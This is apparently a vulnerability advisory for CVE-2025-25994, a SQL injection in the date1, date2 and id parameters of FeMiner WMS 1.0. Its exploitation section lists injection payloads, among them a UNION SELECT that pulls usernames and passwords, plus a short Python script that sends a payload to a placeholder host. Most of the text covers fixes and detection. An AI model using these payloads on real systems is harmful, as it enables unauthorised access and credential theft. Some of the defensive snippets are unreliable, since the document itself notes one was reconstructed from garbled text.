FeMiner WMS 1.0, SQL Injection, CVE-2025-25994 (Critical)

How CVE-2025-25994 Works

This vulnerability in FeMiner WMS 1.0 arises due to improper input sanitization in the `date1`, `date2`, and `id` parameters. An attacker can inject malicious SQL queries through these parameters, manipulating database operations. The application constructs SQL queries by directly concatenating user-supplied input without validation, enabling unauthorized access to sensitive data such as user credentials, transaction records, or administrative details. Exploitation occurs via crafted HTTP requests, where injected SQL commands bypass authentication and execute arbitrary database operations.

DailyCVE Form:

Platform: FeMiner WMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-02-14

What Undercode Says:

Exploitation:

1. Craft Malicious Payload:

' OR 1=1--

Injected into `date1` to bypass filters.

2. Exfiltrate Data:

' UNION SELECT username, password FROM users--

Retrieves credentials via `id` parameter.

3. Automated Exploit (Python):

import requests
target = "http://victim.com/wms/query"
payload = {"date1": "' UNION SELECT 1,@@version--", "id": "1"}
response = requests.post(target, data=payload)
print(response.text)

Protection:

1. Input Validation:

// Allow-list check on date1; the same check belongs on date2, and `id` should be digits only.
if (!preg_match("/^[0-9-]+$/", $_POST['date1'])) {
    die("Invalid input");
}

2. Prepared Statements:

cursor.execute("SELECT * FROM orders WHERE date BETWEEN %s AND %s", (date1, date2))
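
The two fixes above side by side, as an added example that is not part of the original post or of FeMiner's code: a constructed in-memory `orders` table stands in for the WMS database, `vulnerable_query` mirrors the concatenation flaw, and `safe_query` applies allow-list validation of `date1`, `date2` and `id` before a parameterised query.

```python
import re
import sqlite3

# Constructed stand-in for the WMS orders table (sample schema and rows, not FeMiner's).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, order_date TEXT, customer TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                     [(1, "2025-02-01", "alice"), (2, "2025-02-10", "bob"),
                      (3, "2025-03-05", "carol")])
    return conn

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")   # strict YYYY-MM-DD
ID_RE = re.compile(r"\d{1,10}")              # digits only for `id`

def vulnerable_query(conn, date1, date2):
    # The flaw: user input is pasted straight into the SQL text, so a quote in
    # date2 ends the string literal and the remainder becomes SQL.
    sql = (f"SELECT id FROM orders WHERE order_date BETWEEN '{date1}' AND '{date2}' "
           "ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def safe_query(conn, date1, date2, order_id=None):
    # 1. Allow-list validation: reject anything that is not a plain date / integer.
    for name, value in (("date1", date1), ("date2", date2)):
        if not DATE_RE.fullmatch(value):
            raise ValueError(f"invalid {name}")
    sql = "SELECT id FROM orders WHERE order_date BETWEEN ? AND ?"
    params = [date1, date2]
    if order_id is not None:
        if not ID_RE.fullmatch(order_id):
            raise ValueError("invalid id")
        sql += " AND id = ?"
        params.append(int(order_id))
    # 2. Parameterised query: the driver passes values separately from the SQL
    #    text, so even a quote that slips past validation is just data.
    return [row[0] for row in conn.execute(sql + " ORDER BY id", params)]

def is_rejected(conn, date1, date2, order_id=None):
    # Helper for checking that hostile input never reaches the database.
    try:
        safe_query(conn, date1, date2, order_id)
    except ValueError:
        return True
    return False
```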

3. WAF Rules:

location /wms/ {
    # ModSecurity rejects rules without an id; 100001 is a placeholder in the local range.
    modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:100001,phase:2,deny,log,status:403"';
}

4. Patch Verification:

curl -I http://victim.com/wms/ | grep "X-Patched: CVE-2025-25994"

5. Log Analysis:

grep "SQL syntax" /var/log/wms/access.log

6. Mitigation (Temporary):

# Flags reconstructed from a garbled original: [NC] = case-insensitive match, [F] = 403 Forbidden.
RewriteCond %{QUERY_STRING} (union|select|--) [NC]
RewriteRule ^ - [F]

7. Database Hardening:

REVOKE ALL PRIVILEGES ON wms_db.* FROM 'webuser'@'%';
GRANT SELECT ON wms_db.orders TO 'webuser'@'%';

8. Exploit Detection (Snort):

# sid 1000001 is a placeholder in the local rule range; every Snort rule needs a sid.
alert tcp any any -> $HOME_NET 80 (msg:"CVE-2025-25994 Exploit"; flow:to_server,established; content:"date1='"; nocase; sid:1000001; rev:1;)

9. Vendor Patch:

Upgrade to FeMiner WMS 1.1 or apply vendor-supplied patches.

10. Post-Exploit Analysis:

strings /var/lib/mysql/wms_db/users.MYD | grep "@"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
